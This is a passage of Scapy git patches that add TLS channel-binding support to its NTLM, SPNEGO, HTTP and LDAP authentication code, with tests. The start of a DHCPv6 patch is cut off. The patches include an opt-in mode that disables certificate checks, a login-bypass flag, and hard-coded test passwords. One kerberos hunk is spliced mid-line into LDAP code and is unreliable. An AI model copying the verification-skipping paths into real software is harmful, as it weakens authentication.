context.wrap_socket(sock, server_hostname=host) + if self.ssp: + # Compute the channel binding token (CBT) + self.chan_bindings = GssChannelBindings.fromssl( + ChannelBindingType.TLS_SERVER_END_POINT, + sslsock=sock, + ) self.sock = SSLStreamSocket(sock, HTTP) else: self.sock = StreamSocket(sock, HTTP) @@ -925,6 +937,7 @@ def request( self.sspcontext, ssp_blob, req_flags=0, + chan_bindings=self.chan_bindings, ) if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: raise Scapy_Exception("Authentication failure") @@ -948,7 +961,7 @@ def request( def close(self): if self.verb: - print("X Connection to %s closed\n" % repr(self.sock.ins.getpeername())) + print("X Connection to server closed\n") self.sock.close() @@ -1040,6 +1053,8 @@ def __init__( self.ssp = ssp self.authmethod = mech.value self.sspcontext = None + self.ssp_req_flags = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS + self.chan_bindings = GSS_C_NO_CHANNEL_BINDINGS self.basic = False self.BASIC_IDENTITIES = kwargs.pop("BASIC_IDENTITIES", {}) self.BASIC_REALM = kwargs.pop("BASIC_REALM", "default") @@ -1125,7 +1140,10 @@ def AUTH(self, pkt=None): raise self.AUTH_ERROR(proxy) # And call the SSP self.sspcontext, tok, status = self.ssp.GSS_Accept_sec_context( - self.sspcontext, ssp_blob + self.sspcontext, + ssp_blob, + req_flags=self.ssp_req_flags, + chan_bindings=self.chan_bindings, ) else: # This is actually Basic authentication @@ -1141,7 +1159,7 @@ def AUTH(self, pkt=None): tok, status = None, GSS_S_FAILURE # Send answer if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: - self.debug(3, "Authentication failed.") + self.debug(3, "Authentication failed: %s." % status) raise self.AUTH_ERROR(proxy) elif status == GSS_S_CONTINUE_NEEDED: data = self.authmethod.encode() @@ -1252,9 +1270,11 @@ class HTTPS_Server(HTTP_Server): This has the same arguments and attributes as HTTP_Server, with the addition of: :param sslcontext: an optional SSLContext object. - If used, cert and key are ignored. + If used, key is ignored but cert can still be used for + channel bindings. :param cert: path to the certificate :param key: path to the key + :param require_cbt: require Channel Bindings to be valid """ socketcls = None @@ -1267,6 +1287,7 @@ def __init__( key=None, sslcontext=None, ssp=None, + require_cbt=False, *args, **kwargs, ): @@ -1284,6 +1305,8 @@ def __init__( context.wrap_socket(kwargs["sock"], server_side=True), self.pkt_cls, ) + + # Call super super(HTTPS_Server, self).__init__( mech=mech, verb=verb, @@ -1291,3 +1314,13 @@ def __init__( *args, **kwargs, ) + + # Set channel binding + if cert: + self.chan_bindings = GssChannelBindings.fromssl( + ChannelBindingType.TLS_SERVER_END_POINT, + certfile=cert, + ) + if require_cbt: + # We require CBT by removing GSS_S_ALLOW_MISSING_BINDINGS + self.ssp_req_flags &= ~GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index b4d5d59f767..b3be884d46c 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -124,11 +124,14 @@ from scapy.layers.gssapi import ( GSSAPI_BLOB, GSS_C_FLAGS, + GSS_C_NO_CHANNEL_BINDINGS, + GSS_S_BAD_BINDINGS, GSS_S_BAD_MECH, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, GSS_S_DEFECTIVE_TOKEN, GSS_S_FAILURE, + GSS_S_FLAGS, GssChannelBindings, SSP, _GSSAPI_OIDS, @@ -2108,22 +2111,7 @@ class KRB_GSS_EXT(Packet): class KRB_AuthenticatorChecksum(Packet): fields_desc = [ FieldLenField("Lgth", None, length_of="Bnd", fmt="=" in x - else LDAP_FilterApproxMatch - if "~=" in x - else LDAP_FilterEqual + else ( + LDAP_FilterGreaterOrEqual + if ">=" in x + else LDAP_FilterApproxMatch if "~=" in x else LDAP_FilterEqual + ) )( attributeType=ASN1_STRING(x[0].strip()), attributeValue=ASN1_STRING(x[2]), @@ -1718,6 +1723,20 @@ def __init__(self, *args, **kwargs): self.resultCode = kwargs.pop("resultCode", None) self.diagnosticMessage = kwargs.pop("diagnosticMessage", None) super(LDAP_Exception, self).__init__(*args, **kwargs) + # If there's a 'data' string argument, attempt to parse the error code. + try: + m = re.match(r"(\d+): LdapErr.*", self.diagnosticMessage) + if m: + errstr = m.group(1) + err = int(errstr, 16) + if err in STATUS_ERREF: + self.diagnosticMessage = self.diagnosticMessage.replace( + errstr, errstr + " (%s)" % STATUS_ERREF[err], 1 + ) + except ValueError: + pass + # Add note if this exception is raised + self.add_note(self.diagnosticMessage) class LDAP_Client(object): @@ -1789,18 +1808,30 @@ def __init__( self.sign = False # Session status self.sasl_wrap = False + self.chan_bindings = None self.bound = False self.messageID = 0 - def connect(self, ip, port=None, use_ssl=False, sslcontext=None, timeout=5): + def connect( + self, + ip, + port=None, + use_ssl=False, + sslcontext=None, + sni=None, + no_check_certificate=False, + timeout=5, + ): """ Initiate a connection - :param ip: the IP to connect to. + :param ip: the IP or hostname to connect to. :param port: the port to connect to. (Default: 389 or 636) :param use_ssl: whether to use LDAPS or not. (Default: False) :param sslcontext: an optional SSLContext to use. + :param sni: (optional) specify the SNI to use if LDAPS, otherwise use ip. + :param no_check_certificate: with SSL, do not check the certificate """ self.ssl = use_ssl self.sslcontext = sslcontext @@ -1829,17 +1860,26 @@ def connect(self, ip, port=None, use_ssl=False, sslcontext=None, timeout=5): "\u2514 Connected from %s" % repr(sock.getsockname()) ) ) + # For SSL, build and apply SSLContext if self.ssl: if self.sslcontext is None: - context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) - # Hm, this is insecure. - context.check_hostname = False - context.verify_mode = ssl.CERT_NONE + if no_check_certificate: + context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + else: + context = ssl.create_default_context() else: context = self.sslcontext - sock = context.wrap_socket(sock) + sock = context.wrap_socket(sock, server_hostname=sni or ip) + # Wrap the socket in a Scapy socket if self.ssl: self.sock = SSLStreamSocket(sock, LDAP) + # Compute the channel binding token (CBT) + self.chan_bindings = GssChannelBindings.fromssl( + ChannelBindingType.TLS_SERVER_END_POINT, + sslsock=sock, + ) else: self.sock = StreamSocket(sock, LDAP) @@ -1979,9 +2019,10 @@ def bind( or not isinstance(resp.protocolOp, LDAP_BindResponse) or resp.protocolOp.resultCode != 0 ): - if self.verb: - resp.show() - raise RuntimeError("LDAP simple bind failed !") + raise LDAP_Exception( + "LDAP simple bind failed !", + resp=resp, + ) status = GSS_S_COMPLETE elif self.mech == LDAP_BIND_MECHS.SICILY: # [MS-ADTS] sect 5.1.1.1.3 @@ -1993,8 +2034,10 @@ def bind( ) ) if resp.protocolOp.resultCode != 0: - resp.show() - raise RuntimeError("Sicily package discovery failed !") + raise LDAP_Exception( + "Sicily package discovery failed !", + resp=resp, + ) # 2. First exchange: Negotiate self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, @@ -2016,11 +2059,15 @@ def bind( ) val = resp.protocolOp.serverCreds if not val: - resp.show() - raise RuntimeError("Sicily negotiate failed !") + raise LDAP_Exception( + "Sicily negotiate failed !", + resp=resp, + ) # 3. Second exchange: Response self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( - self.sspcontext, GSSAPI_BLOB(val) + self.sspcontext, + GSSAPI_BLOB(val), + chan_bindings=self.chan_bindings, ) resp = self.sr1( LDAP_BindRequest( @@ -2050,6 +2097,7 @@ def bind( | (GSS_C_FLAGS.GSS_C_INTEG_FLAG if self.sign else 0) | (GSS_C_FLAGS.GSS_C_CONF_FLAG if self.encrypt else 0) ), + chan_bindings=self.chan_bindings, ) while token: resp = self.sr1( @@ -2071,13 +2119,17 @@ def bind( status = resp.protocolOp.resultCode break self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( - self.sspcontext, GSSAPI_BLOB(val) + self.sspcontext, + GSSAPI_BLOB(val), + chan_bindings=self.chan_bindings, ) else: status = GSS_S_COMPLETE if status != GSS_S_COMPLETE: - resp.show() - raise RuntimeError("%s bind failed !" % self.mech.name) + raise LDAP_Exception( + "%s bind failed !" % self.mech.name, + resp=resp, + ) elif self.mech == LDAP_BIND_MECHS.SASL_GSSAPI: # GSSAPI has 2 extra exchanges # https://datatracker.ietf.org/doc/html/rfc2222#section-7.2.1 @@ -2106,12 +2158,14 @@ def bind( raise RuntimeError("GSSAPI SASL failed to negotiate CONFIDENTIALITY !") # Announce client-supported layers saslOptions = LDAP_SASL_GSSAPI_SsfCap( - supported_security_layers="+".join( - (["INTEGRITY"] if self.sign else []) - + (["CONFIDENTIALITY"] if self.encrypt else []) - ) - if (self.sign or self.encrypt) - else "NONE", + supported_security_layers=( + "+".join( + (["INTEGRITY"] if self.sign else []) + + (["CONFIDENTIALITY"] if self.encrypt else []) + ) + if (self.sign or self.encrypt) + else "NONE" + ), # Same as server max_output_token_size=saslOptions.max_output_token_size, ) diff --git a/scapy/layers/msrpce/msnrpc.py b/scapy/layers/msrpce/msnrpc.py index 7c3144649f8..493c8918265 100644 --- a/scapy/layers/msrpce/msnrpc.py +++ b/scapy/layers/msrpce/msnrpc.py @@ -24,9 +24,11 @@ ) from scapy.layers.gssapi import ( GSS_C_FLAGS, + GSS_C_NO_CHANNEL_BINDINGS, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, GSS_S_FAILURE, + GSS_S_FLAGS, ) from scapy.layers.ntlm import RC4, RC4K, RC4Init, SSP @@ -473,7 +475,7 @@ def GSS_VerifyMICEx(self, Context, msgs, signature): self._unsecure(Context, msgs, signature, False) def GSS_Init_sec_context( - self, Context, val=None, req_flags: Optional[GSS_C_FLAGS] = None + self, Context, token=None, req_flags: Optional[GSS_C_FLAGS] = None ): if Context is None: Context = self.CONTEXT(True, req_flags=req_flags, AES=self.AES) @@ -493,9 +495,15 @@ def GSS_Init_sec_context( else: return Context, None, GSS_S_COMPLETE - def GSS_Accept_sec_context(self, Context, val=None): + def GSS_Accept_sec_context( + self, + Context: CONTEXT, + token=None, + req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, + chan_bindings: bytes = GSS_C_NO_CHANNEL_BINDINGS, + ): if Context is None: - Context = self.CONTEXT(False, req_flags=0, AES=self.AES) + Context = self.CONTEXT(False, req_flags=req_flags, AES=self.AES) if Context.state == self.STATE.INIT: Context.state = self.STATE.SRV_SENT_NL diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 5a62498036d..c6cb7f133cd 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -347,7 +347,8 @@ def _bind(self, interface, reqcls, respcls): else: # Call the underlying SSP self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( - self.sspcontext, val=resp.auth_verifier.auth_value + self.sspcontext, + token=resp.auth_verifier.auth_value, ) if status in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: # Authentication should continue @@ -388,7 +389,8 @@ def _bind(self, interface, reqcls, respcls): status = GSS_S_COMPLETE break self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( - self.sspcontext, val=resp.auth_verifier.auth_value + self.sspcontext, + token=resp.auth_verifier.auth_value, ) # Check context acceptance if ( diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 301026383e0..c27d0566b95 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -61,10 +61,14 @@ from scapy.layers.gssapi import ( GSS_C_FLAGS, + GSS_C_NO_CHANNEL_BINDINGS, + GSS_S_BAD_BINDINGS, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, GSS_S_DEFECTIVE_CREDENTIAL, GSS_S_DEFECTIVE_TOKEN, + GSS_S_FLAGS, + GssChannelBindings, SSP, _GSSAPI_OIDS, _GSSAPI_SIGNATURE_OIDS, @@ -1129,7 +1133,7 @@ def SEALKEY(NegFlg, ExportedSessionKey, Mode): raise ValueError("Unknown Mode") elif NegFlg.NEGOTIATE_LM_KEY: if NegFlg.NEGOTIATE_56: - return ExportedSessionKey[:6] + b"\xA0" + return ExportedSessionKey[:6] + b"\xa0" else: return ExportedSessionKey[:4] + b"\xe5\x38\xb0" else: @@ -1368,7 +1372,11 @@ def verifyMechListMIC(self, Context, otherMIC, input): Context.RecvSealHandle = OriginalHandle def GSS_Init_sec_context( - self, Context: CONTEXT, val=None, req_flags: Optional[GSS_C_FLAGS] = None + self, + Context: CONTEXT, + token=None, + req_flags: Optional[GSS_C_FLAGS] = None, + chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): if Context is None: Context = self.CONTEXT(False, req_flags=req_flags) @@ -1432,8 +1440,8 @@ def GSS_Init_sec_context( Context.state = self.STATE.CLI_SENT_NEGO return Context, tok, GSS_S_CONTINUE_NEEDED elif Context.state == self.STATE.CLI_SENT_NEGO: - # Client: auth (val=challenge) - chall_tok = val + # Client: auth (token=challenge) + chall_tok = token if self.UPN is None or self.HASHNT is None: raise ValueError( "Must provide a 'UPN' and a 'HASHNT' or 'PASSWORD' when " @@ -1494,7 +1502,20 @@ def GSS_Init_sec_context( AvId="MsvAvSingleHost", Value=Single_Host_Data(MachineID=os.urandom(32)), ), - AV_PAIR(AvId="MsvAvChannelBindings", Value=b"\x00" * 16), + ] + + ( + [ + AV_PAIR( + # [MS-NLMP] sect 2.2.2.1 refers to RFC 4121 sect 4.1.1.2 + # "The Bnd field contains the MD5 hash of channel bindings" + AvId="MsvAvChannelBindings", + Value=chan_bindings.digestMD5(), + ), + ] + if chan_bindings != GSS_C_NO_CHANNEL_BINDINGS + else [] + ) + + [ AV_PAIR(AvId="MsvAvTargetName", Value="host/" + tok.Workstation), AV_PAIR(AvId="MsvAvEOL"), ] @@ -1555,7 +1576,7 @@ def GSS_Init_sec_context( Context.state = self.STATE.CLI_SENT_AUTH return Context, tok, GSS_S_COMPLETE elif Context.state == self.STATE.CLI_SENT_AUTH: - if val: + if token: # what is that? status = GSS_S_DEFECTIVE_CREDENTIAL else: @@ -1564,13 +1585,19 @@ def GSS_Init_sec_context( else: raise ValueError("NTLMSSP: unexpected state %s" % repr(Context.state)) - def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): + def GSS_Accept_sec_context( + self, + Context: CONTEXT, + token=None, + req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, + chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, + ): if Context is None: - Context = self.CONTEXT(IsAcceptor=True, req_flags=0) + Context = self.CONTEXT(IsAcceptor=True, req_flags=req_flags) if Context.state == self.STATE.INIT: - # Server: challenge (val=negotiate) - nego_tok = val + # Server: challenge (token=negotiate) + nego_tok = token if not nego_tok or NTLM_NEGOTIATE not in nego_tok: log_runtime.debug("NTLMSSP: Unexpected token. Expected NTLM Negotiate") return Context, None, GSS_S_DEFECTIVE_TOKEN @@ -1659,16 +1686,20 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): Context.state = self.STATE.SRV_SENT_CHAL return Context, tok, GSS_S_CONTINUE_NEEDED elif Context.state == self.STATE.SRV_SENT_CHAL: - # server: OK or challenge again (val=auth) - auth_tok = val + # server: OK or challenge again (token=auth) + auth_tok = token + if not auth_tok or NTLM_AUTHENTICATE_V2 not in auth_tok: log_runtime.debug( "NTLMSSP: Unexpected token. Expected NTLM Authenticate v2" ) return Context, None, GSS_S_DEFECTIVE_TOKEN + if self.DO_NOT_CHECK_LOGIN: # Just trust me bro return Context, None, GSS_S_COMPLETE + + # Compute the session key SessionBaseKey = self._getSessionBaseKey(Context, auth_tok) if SessionBaseKey: # [MS-NLMP] sect 3.2.5.1.2 @@ -1686,6 +1717,19 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): Context.ExportedSessionKey = ExportedSessionKey # [MS-SMB] 3.2.5.3 Context.SessionKey = Context.ExportedSessionKey + + # Check the channel bindings + if chan_bindings != GSS_C_NO_CHANNEL_BINDINGS: + try: + Bnd = auth_tok.NtChallengeResponse.getAv(0x000A).Value + if Bnd != chan_bindings.digestMD5(): + # Bad channel bindings + return Context, None, GSS_S_BAD_BINDINGS + except IndexError: + if GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS not in req_flags: + # Uhoh, we required channel bindings + return Context, None, GSS_S_BAD_BINDINGS + # Check the NTProofStr if Context.SessionKey: # Compute NTLM keys @@ -1710,6 +1754,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): if auth_tok.NegotiateFlags.NEGOTIATE_SEAL: Context.flags |= GSS_C_FLAGS.GSS_C_CONF_FLAG return Context, None, GSS_S_COMPLETE + # Bad NTProofStr or unknown user Context.SessionKey = None Context.state = self.STATE.INIT @@ -1726,7 +1771,7 @@ def MaximumSignatureLength(self, Context: CONTEXT): """ return 16 # len(NTLMSSP_MESSAGE_SIGNATURE()) - def GSS_Passive(self, Context: CONTEXT, val=None): + def GSS_Passive(self, Context: CONTEXT, token=None): if Context is None: Context = self.CONTEXT(True) Context.passive = True @@ -1735,24 +1780,24 @@ def GSS_Passive(self, Context: CONTEXT, val=None): # and discard the output. if Context.state == self.STATE.INIT: - if not val or NTLM_NEGOTIATE not in val: + if not token or NTLM_NEGOTIATE not in token: log_runtime.warning("NTLMSSP: Expected NTLM Negotiate") return None, GSS_S_DEFECTIVE_TOKEN - Context.neg_tok = val + Context.neg_tok = token Context.state = self.STATE.CLI_SENT_NEGO return Context, GSS_S_CONTINUE_NEEDED elif Context.state == self.STATE.CLI_SENT_NEGO: - if not val or NTLM_CHALLENGE not in val: + if not token or NTLM_CHALLENGE not in token: log_runtime.warning("NTLMSSP: Expected NTLM Challenge") return None, GSS_S_DEFECTIVE_TOKEN - Context.chall_tok = val + Context.chall_tok = token Context.state = self.STATE.SRV_SENT_CHAL return Context, GSS_S_CONTINUE_NEEDED elif Context.state == self.STATE.SRV_SENT_CHAL: - if not val or NTLM_AUTHENTICATE_V2 not in val: + if not token or NTLM_AUTHENTICATE_V2 not in token: log_runtime.warning("NTLMSSP: Expected NTLM Authenticate") return None, GSS_S_DEFECTIVE_TOKEN - Context, _, status = self.GSS_Accept_sec_context(Context, val) + Context, _, status = self.GSS_Accept_sec_context(Context, token) if status != GSS_S_COMPLETE: log_runtime.info("NTLMSSP: auth failed.") Context.state = self.STATE.INIT diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index d7c18f07a16..230b3be4d8b 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -101,9 +101,12 @@ 0x80000005: "STATUS_BUFFER_OVERFLOW", 0x80000006: "STATUS_NO_MORE_FILES", 0x8000002D: "STATUS_STOPPED_ON_SYMLINK", + 0x80090308: "SEC_E_INVALID_TOKEN", 0x8009030C: "SEC_E_LOGON_DENIED", 0x8009030F: "SEC_E_MESSAGE_ALTERED", 0x80090310: "SEC_E_OUT_OF_SEQUENCE", + 0x80090346: "SEC_E_BAD_BINDINGS", + 0x80090351: "SEC_E_SMARTCARD_CERT_REVOKED", 0xC0000003: "STATUS_INVALID_INFO_CLASS", 0xC0000004: "STATUS_INFO_LENGTH_MISMATCH", 0xC000000D: "STATUS_INVALID_PARAMETER", diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 5746d538186..b0532491abe 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -456,7 +456,7 @@ def NEGOTIATED(self, ssp_blob=None): # Begin session establishment ssp_tuple = self.session.ssp.GSS_Init_sec_context( self.session.sspcontext, - ssp_blob, + token=ssp_blob, req_flags=( GSS_C_FLAGS.GSS_C_MUTUAL_FLAG | (GSS_C_FLAGS.GSS_C_INTEG_FLAG if self.session.SigningRequired else 0) @@ -615,7 +615,8 @@ def AUTH_FAILED(self): @ATMT.state() def AUTHENTICATED(self, ssp_blob=None): self.session.sspcontext, _, status = self.session.ssp.GSS_Init_sec_context( - self.session.sspcontext, ssp_blob + self.session.sspcontext, + token=ssp_blob, ) if status != GSS_S_COMPLETE: raise ValueError("Internal error: the SSP completed with an error.") diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index cfaeeaed75f..f962b2fb1c8 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -61,9 +61,12 @@ GSSAPI_BLOB, GSSAPI_BLOB_SIGNATURE, GSS_C_FLAGS, + GSS_C_NO_CHANNEL_BINDINGS, GSS_S_BAD_MECH, GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED, + GSS_S_FLAGS, + GssChannelBindings, SSP, _GSSAPI_OIDS, _GSSAPI_SIGNATURE_OIDS, @@ -710,7 +713,17 @@ def GSS_VerifyMICEx(self, Context, *args, **kwargs): def LegsAmount(self, Context: CONTEXT): return 4 - def _common_spnego_handler(self, Context, IsClient, val=None, req_flags=None): + def _common_spnego_handler( + self, + Context, + IsClient, + token=None, + req_flags=None, + chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, + ): + """ + Common code shared across both GSS_sec_Init_Context and GSS_sec_Accept_Context + """ if Context is None: # New Context Context = SPNEGOSSP.CONTEXT( @@ -723,8 +736,8 @@ def _common_spnego_handler(self, Context, IsClient, val=None, req_flags=None): # Extract values from GSSAPI token status, MIC, otherMIC, rawToken = 0, None, None, False - if val: - val, status, otherMIC, rawToken = self._extract_gssapi(Context, val) + if token: + token, status, otherMIC, rawToken = self._extract_gssapi(Context, token) # If we don't have a SSP already negotiated, check for requested and available # SSPs and find a common one. @@ -744,7 +757,7 @@ def _common_spnego_handler(self, Context, IsClient, val=None, req_flags=None): # Check whether the selected SSP was the one preferred by the client if ( Context.negotiated_mechtype != Context.requested_mechtypes[0] - and val + and token ): Context.first_choice = False # No SSPs were requested. Use the first available SSP we know. @@ -772,12 +785,16 @@ def _common_spnego_handler(self, Context, IsClient, val=None, req_flags=None): status, ) = Context.ssp.GSS_Init_sec_context( Context.sub_context, - val=val, + token=token, req_flags=Context.req_flags, + chan_bindings=chan_bindings, ) else: Context.sub_context, tok, status = Context.ssp.GSS_Accept_sec_context( - Context.sub_context, val=val + Context.sub_context, + token=token, + req_flags=Context.req_flags, + chan_bindings=chan_bindings, ) # Check whether client or server says the specified mechanism is not valid if status == GSS_S_BAD_MECH: @@ -808,7 +825,13 @@ def _common_spnego_handler(self, Context, IsClient, val=None, req_flags=None): Context.sub_context = None # Reset the SSP context if IsClient: # Call ourselves again for the client to generate a token - return self._common_spnego_handler(Context, True, None) + return self._common_spnego_handler( + Context, + IsClient=True, + token=None, + req_flags=req_flags, + chan_bindings=chan_bindings, + ) else: # Return nothing but the supported SSP list tok, status = None, GSS_S_CONTINUE_NEEDED @@ -919,23 +942,45 @@ def _common_spnego_handler(self, Context, IsClient, val=None, req_flags=None): return Context, spnego_tok, status def GSS_Init_sec_context( - self, Context: CONTEXT, val=None, req_flags: Optional[GSS_C_FLAGS] = None + self, + Context: CONTEXT, + token=None, + req_flags: Optional[GSS_C_FLAGS] = None, + chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): - return self._common_spnego_handler(Context, True, val=val, req_flags=req_flags) + return self._common_spnego_handler( + Context, + True, + token=token, + req_flags=req_flags, + chan_bindings=chan_bindings, + ) - def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): - return self._common_spnego_handler(Context, False, val=val, req_flags=0) + def GSS_Accept_sec_context( + self, + Context: CONTEXT, + token=None, + req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, + chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, + ): + return self._common_spnego_handler( + Context, + False, + token=token, + req_flags=req_flags, + chan_bindings=chan_bindings, + ) - def GSS_Passive(self, Context: CONTEXT, val=None): + def GSS_Passive(self, Context: CONTEXT, token=None): if Context is None: # New Context Context = SPNEGOSSP.CONTEXT(self.supported_ssps) Context.passive = True # Extraction - val, status, _, rawToken = self._extract_gssapi(Context, val) + token, status, _, rawToken = self._extract_gssapi(Context, token) - if val is None and status == GSS_S_COMPLETE: + if token is None and status == GSS_S_COMPLETE: return Context, None # Just get the negotiated SSP @@ -961,7 +1006,9 @@ def GSS_Passive(self, Context: CONTEXT, val=None): Context.ssp = ssp # Passthrough - Context.sub_context, status = Context.ssp.GSS_Passive(Context.sub_context, val) + Context.sub_context, status = Context.ssp.GSS_Passive( + Context.sub_context, token + ) return Context, status diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 0317dc521e6..aa3b03febc8 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -768,6 +768,15 @@ def encrypt(self, msg, t="pkcs", h="sha256", mgf=None, L=None): def verify(self, msg, sig, t="pkcs", h="sha256", mgf=None, L=None): return self.pubKey.verify(msg, sig, t=t, h=h, mgf=mgf, L=L) + def getSignatureHash(self): + """ + Return the hash used by the 'signatureAlgorithm' + """ + tbsCert = self.tbsCertificate + sigAlg = tbsCert.signature + h = hash_by_oid[sigAlg.algorithm.val] + return _get_hash(h) + def remainingDays(self, now=None): """ Based on the value of notAfter field, returns the number of diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index 591c3275098..2d2093b976d 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -279,20 +279,32 @@ assert gzip.decompress(z) == c.load + Test HTTP client/server = Util function to launch HTTP_server -~ http-client +~ http-client https-client -from scapy.layers.http import HTTP_Server, HTTP_AUTH_MECHS +from scapy.layers.http import ( + HTTP_Server, + HTTPS_Server, + HTTP_AUTH_MECHS, +) class run_httpserver: - def __init__(self, mech=None, ssp=None, **kwargs): + def __init__(self, mech=None, ssp=None, ssl=False, **kwargs): self.server = None self.mech = mech self.ssp = ssp + self.ssl = ssl self.kwargs = kwargs def __enter__(self): - print("@ Starting http server") + if self.ssl: + cls = HTTPS_Server + self.kwargs["cert"] = scapy_path("/test/scapy/layers/tls/pki/srv_cert.pem") + self.kwargs["key"] = scapy_path("/test/scapy/layers/tls/pki/srv_key.pem") + print("@ Starting https server") + else: + cls = HTTP_Server + print("@ Starting http server") # Start server - self.server = HTTP_Server.spawn( + self.server = cls.spawn( 8080, iface=conf.loopback_name, mech=self.mech, ssp=self.ssp, @@ -327,7 +339,7 @@ class run_httpserver: print("@ http server stopped !") -= HTTP_client fails to ask HTTP_server that required authentication += HTTP - HTTP_client fails to ask HTTP_server that required authentication ~ http-client from scapy.layers.http import HTTP_Client @@ -339,7 +351,7 @@ with run_httpserver(mech=HTTP_AUTH_MECHS.NTLM, ssp=NTLMSSP(IDENTITIES={"user": M assert resp.Status_Code == b"401" -= HTTP_client asks HTTP_server with NTLMSSP += HTTP - HTTP_client asks HTTP_server with NTLMSSP ~ http-client from scapy.layers.http import HTTP_Client @@ -354,7 +366,7 @@ with run_httpserver(mech=HTTP_AUTH_MECHS.NTLM, ssp=NTLMSSP(IDENTITIES={"user": M assert resp.load == b'

      OK

      ' -= HTTP_Server with native python client with Basic auth += HTTP - HTTP_Server with native python client with Basic auth ~ http-client import urllib.request @@ -373,7 +385,7 @@ with run_httpserver(mech=HTTP_AUTH_MECHS.BASIC, BASIC_IDENTITIES={"user": "passw assert html == "

      OK

      " -= HTTP_Server with native python client without auth += HTTP - HTTP_Server with native python client without auth ~ http-client import urllib.request @@ -383,3 +395,21 @@ with run_httpserver(mech=HTTP_AUTH_MECHS.NONE): html = f.read().decode('utf-8') assert html == "

      OK

      " + ++ Test HTTPS client/server + += HTTPS - HTTPS_client asks HTTPS_server with NTLMSSP and CBT +~ https-client + +from scapy.layers.http import HTTP_Client + +with run_httpserver(mech=HTTP_AUTH_MECHS.NTLM, ssp=NTLMSSP(IDENTITIES={"user": MD4le("password")}), ssl=True): + client = HTTP_Client( + HTTP_AUTH_MECHS.NTLM, + ssp=NTLMSSP(UPN="user", PASSWORD="password"), + no_check_certificate=True, + ) + resp = client.request("https://127.0.0.1:8080") + client.close() + +assert resp.load == b'

      OK

      ' diff --git a/test/scapy/layers/ldapopenldap.uts b/test/scapy/layers/ldapopenldap.uts index aabc2363841..a25b692d944 100644 --- a/test/scapy/layers/ldapopenldap.uts +++ b/test/scapy/layers/ldapopenldap.uts @@ -30,3 +30,13 @@ assert res == { 'userPassword': ['testing'] } } + += (OpenLDAP) connect to server using SSL +~ disabled + +# We need a version of OpenLDAP that is more recent. Let's wait. + +cli = LDAP_Client() +cli.connect("127.0.0.1", use_ssl=True, no_check_certificate=True) +cli.bind(LDAP_BIND_MECHS.SIMPLE, simple_username="cn=admin,dc=scapy,dc=net", simple_password="Bonjour1") +cli.close() From 83f8bc40c868fbb0a17655044c8eacd15f9d3c89 Mon Sep 17 00:00:00 2001 From: Tomek Mrugalski Date: Mon, 21 Apr 2025 16:48:09 -0500 Subject: [PATCH 1463/1632] DHCPv6: add RFC9686 support (#4694) This adds 2 new DHCPv6 messages and 1 new DHCPv6 option - ADDR-REG-INFORM message added - ADDR-REG-REPLY message added - ADDR-REG option added - Flake8 appeased - Unit-tests added --- scapy/layers/dhcp6.py | 37 ++++++++++++++++++++-- test/scapy/layers/dhcp6.uts | 61 +++++++++++++++++++++++++++++++++++++ 2 files changed, 96 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index f8eef019574..84737991dff 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -57,7 +57,10 @@ def get_cls(name, fallback_cls): 10: "DHCP6_Reconf", 11: "DHCP6_InfoRequest", 12: "DHCP6_RelayForward", - 13: 